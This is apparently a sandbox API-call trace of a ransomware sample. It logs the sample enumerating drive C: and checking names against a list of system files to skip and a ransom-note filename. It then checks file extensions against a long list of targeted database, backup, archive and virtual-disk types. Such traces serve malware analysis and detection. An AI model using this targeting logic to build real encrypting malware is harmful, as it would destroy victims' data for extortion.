1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="temp") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="pagefile.sys") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="boot") returned 1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="ids.txt") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="ntuser.dat") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="perflogs") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="MSBuild") returned -1 [0039.354] lstrlenW (lpString="Config.Msi") returned 10 [0039.354] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0039.354] lstrcpyW (in: lpString1=0x2cce406, lpString2="Config.Msi" | out: lpString1="Config.Msi") returned="Config.Msi" [0039.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7828 [0039.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2c9348 [0039.354] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7830 | out: ListHead=0x2e7710, ListEntry=0x2e7830) returned 0x2e77f0 [0039.354] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="aoldtz.exe") returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="bootmgr") returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="temp") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="pagefile.sys") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="ids.txt") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="ntuser.dat") returned -1 [0039.354] lstrcmpiW (lpString1="Documents and Settings", lpString2="perflogs") returned -1 [0039.355] lstrcmpiW (lpString1="Documents and Settings", lpString2="MSBuild") returned -1 [0039.355] lstrlenW (lpString="Documents and Settings") returned 22 [0039.355] lstrlenW (lpString="C:\\Config.Msi") returned 13 [0039.355] lstrcpyW (in: lpString1=0x2cce406, lpString2="Documents and Settings" | out: lpString1="Documents and Settings") returned="Documents and Settings" [0039.355] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7848 [0039.355] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cc570 [0039.355] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7850 | out: ListHead=0x2e7710, ListEntry=0x2e7850) returned 0x2e7830 [0039.355] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="aoldtz.exe") returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootmgr") returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="temp") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="pagefile.sys") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot") returned 1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ids.txt") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="perflogs") returned -1 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2="MSBuild") returned -1 [0039.355] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.355] lstrlenW (lpString="C:\\Documents and Settings") returned 25 [0039.355] lstrcpyW (in: lpString1=0x2cce406, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0039.355] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.355] lstrlenW (lpString="Ares865") returned 7 [0039.355] lstrcmpiW (lpString1="fil.sys", lpString2="Ares865") returned 1 [0039.355] lstrlenW (lpString=".dll") returned 4 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".dll") returned 1 [0039.355] lstrlenW (lpString=".lnk") returned 4 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".lnk") returned 1 [0039.355] lstrlenW (lpString=".ini") returned 4 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".ini") returned 1 [0039.355] lstrlenW (lpString=".sys") returned 4 [0039.355] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".sys") returned 1 [0039.355] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.355] lstrlenW (lpString="bak") returned 3 [0039.355] lstrcmpiW (lpString1="sys", lpString2="bak") returned 1 [0039.356] lstrlenW (lpString="ba_") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="ba_") returned 1 [0039.356] lstrlenW (lpString="dbb") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="dbb") returned 1 [0039.356] lstrlenW (lpString="vmdk") returned 4 [0039.356] lstrcmpiW (lpString1=".sys", lpString2="vmdk") returned -1 [0039.356] lstrlenW (lpString="rar") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="rar") returned 1 [0039.356] lstrlenW (lpString="zip") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="zip") returned -1 [0039.356] lstrlenW (lpString="tgz") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="tgz") returned -1 [0039.356] lstrlenW (lpString="vbox") returned 4 [0039.356] lstrcmpiW (lpString1=".sys", lpString2="vbox") returned -1 [0039.356] lstrlenW (lpString="vdi") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="vdi") returned -1 [0039.356] lstrlenW (lpString="vhd") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="vhd") returned -1 [0039.356] lstrlenW (lpString="vhdx") returned 4 [0039.356] lstrcmpiW (lpString1=".sys", lpString2="vhdx") returned -1 [0039.356] lstrlenW (lpString="avhd") returned 4 [0039.356] lstrcmpiW (lpString1=".sys", lpString2="avhd") returned -1 [0039.356] lstrlenW (lpString="db") returned 2 [0039.356] lstrcmpiW (lpString1="ys", lpString2="db") returned 1 [0039.356] lstrlenW (lpString="db2") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="db2") returned 1 [0039.356] lstrlenW (lpString="db3") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="db3") returned 1 [0039.356] lstrlenW (lpString="dbf") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="dbf") returned 1 [0039.356] lstrlenW (lpString="mdf") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="mdf") returned 1 [0039.356] lstrlenW (lpString="mdb") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="mdb") returned 1 [0039.356] lstrlenW (lpString="sql") returned 3 [0039.356] lstrcmpiW (lpString1="sys", lpString2="sql") returned 1 [0039.356] lstrlenW (lpString="sqlite") returned 6 [0039.356] lstrcmpiW (lpString1="il.sys", lpString2="sqlite") returned -1 [0039.356] lstrlenW (lpString="sqlite3") returned 7 [0039.356] lstrcmpiW (lpString1="fil.sys", lpString2="sqlite3") returned -1 [0039.357] lstrlenW (lpString="sqlitedb") returned 8 [0039.357] lstrcmpiW (lpString1="rfil.sys", lpString2="sqlitedb") returned -1 [0039.357] lstrlenW (lpString="xml") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="xml") returned -1 [0039.357] lstrlenW (lpString="$er") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="$er") returned 1 [0039.357] lstrlenW (lpString="4dd") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="4dd") returned 1 [0039.357] lstrlenW (lpString="4dl") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="4dl") returned 1 [0039.357] lstrlenW (lpString="^^^") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="^^^") returned 1 [0039.357] lstrlenW (lpString="abs") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="abs") returned 1 [0039.357] lstrlenW (lpString="abx") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="abx") returned 1 [0039.357] lstrlenW (lpString="accdb") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accdb") returned 1 [0039.357] lstrlenW (lpString="accdc") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accdc") returned 1 [0039.357] lstrlenW (lpString="accde") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accde") returned 1 [0039.357] lstrlenW (lpString="accdr") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accdr") returned 1 [0039.357] lstrlenW (lpString="accdt") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accdt") returned 1 [0039.357] lstrlenW (lpString="accdw") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accdw") returned 1 [0039.357] lstrlenW (lpString="accft") returned 5 [0039.357] lstrcmpiW (lpString1="l.sys", lpString2="accft") returned 1 [0039.357] lstrlenW (lpString="adb") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="adb") returned 1 [0039.357] lstrlenW (lpString="adb") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="adb") returned 1 [0039.357] lstrlenW (lpString="ade") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="ade") returned 1 [0039.357] lstrlenW (lpString="adf") returned 3 [0039.357] lstrcmpiW (lpString1="sys", lpString2="adf") returned 1 [0039.358] lstrlenW (lpString="adn") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="adn") returned 1 [0039.358] lstrlenW (lpString="adp") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="adp") returned 1 [0039.358] lstrlenW (lpString="alf") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="alf") returned 1 [0039.358] lstrlenW (lpString="ask") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="ask") returned 1 [0039.358] lstrlenW (lpString="btr") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="btr") returned 1 [0039.358] lstrlenW (lpString="cat") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="cat") returned 1 [0039.358] lstrlenW (lpString="cdb") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="cdb") returned 1 [0039.358] lstrlenW (lpString="ckp") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="ckp") returned 1 [0039.358] lstrlenW (lpString="cma") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="cma") returned 1 [0039.358] lstrlenW (lpString="cpd") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="cpd") returned 1 [0039.358] lstrlenW (lpString="dacpac") returned 6 [0039.358] lstrcmpiW (lpString1="il.sys", lpString2="dacpac") returned 1 [0039.358] lstrlenW (lpString="dad") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="dad") returned 1 [0039.358] lstrlenW (lpString="dadiagrams") returned 10 [0039.358] lstrcmpiW (lpString1="berfil.sys", lpString2="dadiagrams") returned -1 [0039.358] lstrlenW (lpString="daschema") returned 8 [0039.358] lstrcmpiW (lpString1="rfil.sys", lpString2="daschema") returned 1 [0039.358] lstrlenW (lpString="db-journal") returned 10 [0039.358] lstrcmpiW (lpString1="berfil.sys", lpString2="db-journal") returned -1 [0039.358] lstrlenW (lpString="db-shm") returned 6 [0039.358] lstrcmpiW (lpString1="il.sys", lpString2="db-shm") returned 1 [0039.358] lstrlenW (lpString="db-wal") returned 6 [0039.358] lstrcmpiW (lpString1="il.sys", lpString2="db-wal") returned 1 [0039.358] lstrlenW (lpString="dbc") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="dbc") returned 1 [0039.358] lstrlenW (lpString="dbs") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="dbs") returned 1 [0039.358] lstrlenW (lpString="dbt") returned 3 [0039.358] lstrcmpiW (lpString1="sys", lpString2="dbt") returned 1 [0039.359] lstrlenW (lpString="dbv") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dbv") returned 1 [0039.359] lstrlenW (lpString="dbx") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dbx") returned 1 [0039.359] lstrlenW (lpString="dcb") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dcb") returned 1 [0039.359] lstrlenW (lpString="dct") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dct") returned 1 [0039.359] lstrlenW (lpString="dcx") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dcx") returned 1 [0039.359] lstrlenW (lpString="ddl") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="ddl") returned 1 [0039.359] lstrlenW (lpString="dlis") returned 4 [0039.359] lstrcmpiW (lpString1=".sys", lpString2="dlis") returned -1 [0039.359] lstrlenW (lpString="dp1") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dp1") returned 1 [0039.359] lstrlenW (lpString="dqy") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dqy") returned 1 [0039.359] lstrlenW (lpString="dsk") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dsk") returned 1 [0039.359] lstrlenW (lpString="dsn") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dsn") returned 1 [0039.359] lstrlenW (lpString="dtsx") returned 4 [0039.359] lstrcmpiW (lpString1=".sys", lpString2="dtsx") returned -1 [0039.359] lstrlenW (lpString="dxl") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="dxl") returned 1 [0039.359] lstrlenW (lpString="eco") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="eco") returned 1 [0039.359] lstrlenW (lpString="ecx") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="ecx") returned 1 [0039.359] lstrlenW (lpString="edb") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="edb") returned 1 [0039.359] lstrlenW (lpString="epim") returned 4 [0039.359] lstrcmpiW (lpString1=".sys", lpString2="epim") returned -1 [0039.359] lstrlenW (lpString="fcd") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="fcd") returned 1 [0039.359] lstrlenW (lpString="fdb") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="fdb") returned 1 [0039.359] lstrlenW (lpString="fic") returned 3 [0039.359] lstrcmpiW (lpString1="sys", lpString2="fic") returned 1 [0039.360] lstrlenW (lpString="flexolibrary") returned 12 [0039.360] lstrlenW (lpString="fm5") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fm5") returned 1 [0039.360] lstrlenW (lpString="fmp") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fmp") returned 1 [0039.360] lstrlenW (lpString="fmp12") returned 5 [0039.360] lstrcmpiW (lpString1="l.sys", lpString2="fmp12") returned 1 [0039.360] lstrlenW (lpString="fmpsl") returned 5 [0039.360] lstrcmpiW (lpString1="l.sys", lpString2="fmpsl") returned 1 [0039.360] lstrlenW (lpString="fol") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fol") returned 1 [0039.360] lstrlenW (lpString="fp3") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fp3") returned 1 [0039.360] lstrlenW (lpString="fp4") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fp4") returned 1 [0039.360] lstrlenW (lpString="fp5") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fp5") returned 1 [0039.360] lstrlenW (lpString="fp7") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fp7") returned 1 [0039.360] lstrlenW (lpString="fpt") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="fpt") returned 1 [0039.360] lstrlenW (lpString="frm") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="frm") returned 1 [0039.360] lstrlenW (lpString="gdb") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="gdb") returned 1 [0039.360] lstrlenW (lpString="gdb") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="gdb") returned 1 [0039.360] lstrlenW (lpString="grdb") returned 4 [0039.360] lstrcmpiW (lpString1=".sys", lpString2="grdb") returned -1 [0039.360] lstrlenW (lpString="gwi") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="gwi") returned 1 [0039.360] lstrlenW (lpString="hdb") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="hdb") returned 1 [0039.360] lstrlenW (lpString="his") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="his") returned 1 [0039.360] lstrlenW (lpString="ib") returned 2 [0039.360] lstrcmpiW (lpString1="ys", lpString2="ib") returned 1 [0039.360] lstrlenW (lpString="idb") returned 3 [0039.360] lstrcmpiW (lpString1="sys", lpString2="idb") returned 1 [0039.360] lstrlenW (lpString="ihx") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="ihx") returned 1 [0039.361] lstrlenW (lpString="itdb") returned 4 [0039.361] lstrcmpiW (lpString1=".sys", lpString2="itdb") returned -1 [0039.361] lstrlenW (lpString="itw") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="itw") returned 1 [0039.361] lstrlenW (lpString="jet") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="jet") returned 1 [0039.361] lstrlenW (lpString="jtx") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="jtx") returned 1 [0039.361] lstrlenW (lpString="kdb") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="kdb") returned 1 [0039.361] lstrlenW (lpString="kexi") returned 4 [0039.361] lstrcmpiW (lpString1=".sys", lpString2="kexi") returned -1 [0039.361] lstrlenW (lpString="kexic") returned 5 [0039.361] lstrcmpiW (lpString1="l.sys", lpString2="kexic") returned 1 [0039.361] lstrlenW (lpString="kexis") returned 5 [0039.361] lstrcmpiW (lpString1="l.sys", lpString2="kexis") returned 1 [0039.361] lstrlenW (lpString="lgc") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="lgc") returned 1 [0039.361] lstrlenW (lpString="lwx") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="lwx") returned 1 [0039.361] lstrlenW (lpString="maf") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="maf") returned 1 [0039.361] lstrlenW (lpString="maq") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="maq") returned 1 [0039.361] lstrlenW (lpString="mar") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="mar") returned 1 [0039.361] lstrlenW (lpString="marshal") returned 7 [0039.361] lstrcmpiW (lpString1="fil.sys", lpString2="marshal") returned -1 [0039.361] lstrlenW (lpString="mas") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="mas") returned 1 [0039.361] lstrlenW (lpString="mav") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="mav") returned 1 [0039.361] lstrlenW (lpString="maw") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="maw") returned 1 [0039.361] lstrlenW (lpString="mdbhtml") returned 7 [0039.361] lstrcmpiW (lpString1="fil.sys", lpString2="mdbhtml") returned -1 [0039.361] lstrlenW (lpString="mdn") returned 3 [0039.361] lstrcmpiW (lpString1="sys", lpString2="mdn") returned 1 [0039.362] lstrlenW (lpString="mdt") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mdt") returned 1 [0039.362] lstrlenW (lpString="mfd") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mfd") returned 1 [0039.362] lstrlenW (lpString="mpd") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mpd") returned 1 [0039.362] lstrlenW (lpString="mrg") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mrg") returned 1 [0039.362] lstrlenW (lpString="mud") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mud") returned 1 [0039.362] lstrlenW (lpString="mwb") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="mwb") returned 1 [0039.362] lstrlenW (lpString="myd") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="myd") returned 1 [0039.362] lstrlenW (lpString="ndf") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="ndf") returned 1 [0039.362] lstrlenW (lpString="nnt") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="nnt") returned 1 [0039.362] lstrlenW (lpString="nrmlib") returned 6 [0039.362] lstrcmpiW (lpString1="il.sys", lpString2="nrmlib") returned -1 [0039.362] lstrlenW (lpString="ns2") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="ns2") returned 1 [0039.362] lstrlenW (lpString="ns3") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="ns3") returned 1 [0039.362] lstrlenW (lpString="ns4") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="ns4") returned 1 [0039.362] lstrlenW (lpString="nsf") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="nsf") returned 1 [0039.362] lstrlenW (lpString="nv") returned 2 [0039.362] lstrcmpiW (lpString1="ys", lpString2="nv") returned 1 [0039.362] lstrlenW (lpString="nv2") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="nv2") returned 1 [0039.362] lstrlenW (lpString="nwdb") returned 4 [0039.362] lstrcmpiW (lpString1=".sys", lpString2="nwdb") returned -1 [0039.362] lstrlenW (lpString="nyf") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="nyf") returned 1 [0039.362] lstrlenW (lpString="odb") returned 3 [0039.362] lstrcmpiW (lpString1="sys", lpString2="odb") returned 1 [0039.362] lstrlenW (lpString="odb") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="odb") returned 1 [0039.363] lstrlenW (lpString="oqy") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="oqy") returned 1 [0039.363] lstrlenW (lpString="ora") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="ora") returned 1 [0039.363] lstrlenW (lpString="orx") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="orx") returned 1 [0039.363] lstrlenW (lpString="owc") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="owc") returned 1 [0039.363] lstrlenW (lpString="p96") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="p96") returned 1 [0039.363] lstrlenW (lpString="p97") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="p97") returned 1 [0039.363] lstrlenW (lpString="pan") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="pan") returned 1 [0039.363] lstrlenW (lpString="pdb") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="pdb") returned 1 [0039.363] lstrlenW (lpString="pdm") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="pdm") returned 1 [0039.363] lstrlenW (lpString="pnz") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="pnz") returned 1 [0039.363] lstrlenW (lpString="qry") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="qry") returned 1 [0039.363] lstrlenW (lpString="qvd") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="qvd") returned 1 [0039.363] lstrlenW (lpString="rbf") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="rbf") returned 1 [0039.363] lstrlenW (lpString="rctd") returned 4 [0039.363] lstrcmpiW (lpString1=".sys", lpString2="rctd") returned -1 [0039.363] lstrlenW (lpString="rod") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="rod") returned 1 [0039.363] lstrlenW (lpString="rodx") returned 4 [0039.363] lstrcmpiW (lpString1=".sys", lpString2="rodx") returned -1 [0039.363] lstrlenW (lpString="rpd") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="rpd") returned 1 [0039.363] lstrlenW (lpString="rsd") returned 3 [0039.363] lstrcmpiW (lpString1="sys", lpString2="rsd") returned 1 [0039.363] lstrlenW (lpString="sas7bdat") returned 8 [0039.363] lstrcmpiW (lpString1="rfil.sys", lpString2="sas7bdat") returned -1 [0039.363] lstrlenW (lpString="sbf") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="sbf") returned 1 [0039.364] lstrlenW (lpString="scx") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="scx") returned 1 [0039.364] lstrlenW (lpString="sdb") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="sdb") returned 1 [0039.364] lstrlenW (lpString="sdc") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="sdc") returned 1 [0039.364] lstrlenW (lpString="sdf") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="sdf") returned 1 [0039.364] lstrlenW (lpString="sis") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="sis") returned 1 [0039.364] lstrlenW (lpString="spq") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="spq") returned 1 [0039.364] lstrlenW (lpString="te") returned 2 [0039.364] lstrcmpiW (lpString1="ys", lpString2="te") returned 1 [0039.364] lstrlenW (lpString="teacher") returned 7 [0039.364] lstrcmpiW (lpString1="fil.sys", lpString2="teacher") returned -1 [0039.364] lstrlenW (lpString="tmd") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="tmd") returned -1 [0039.364] lstrlenW (lpString="tps") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="tps") returned -1 [0039.364] lstrlenW (lpString="trc") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="trc") returned -1 [0039.364] lstrlenW (lpString="trc") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="trc") returned -1 [0039.364] lstrlenW (lpString="trm") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="trm") returned -1 [0039.364] lstrlenW (lpString="udb") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="udb") returned -1 [0039.364] lstrlenW (lpString="udl") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="udl") returned -1 [0039.364] lstrlenW (lpString="usr") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="usr") returned -1 [0039.364] lstrlenW (lpString="v12") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="v12") returned -1 [0039.364] lstrlenW (lpString="vis") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="vis") returned -1 [0039.364] lstrlenW (lpString="vpd") returned 3 [0039.364] lstrcmpiW (lpString1="sys", lpString2="vpd") returned -1 [0039.364] lstrlenW (lpString="vvv") returned 3 [0039.365] lstrcmpiW (lpString1="sys", lpString2="vvv") returned -1 [0039.365] lstrlenW (lpString="wdb") returned 3 [0039.365] lstrcmpiW (lpString1="sys", lpString2="wdb") returned -1 [0039.365] lstrlenW (lpString="wmdb") returned 4 [0039.365] lstrcmpiW (lpString1=".sys", lpString2="wmdb") returned -1 [0039.365] lstrlenW (lpString="wrk") returned 3 [0039.365] lstrcmpiW (lpString1="sys", lpString2="wrk") returned -1 [0039.365] lstrlenW (lpString="xdb") returned 3 [0039.365] lstrcmpiW (lpString1="sys", lpString2="xdb") returned -1 [0039.365] lstrlenW (lpString="xld") returned 3 [0039.365] lstrcmpiW (lpString1="sys", lpString2="xld") returned -1 [0039.365] lstrlenW (lpString="xmlff") returned 5 [0039.365] lstrcmpiW (lpString1="l.sys", lpString2="xmlff") returned 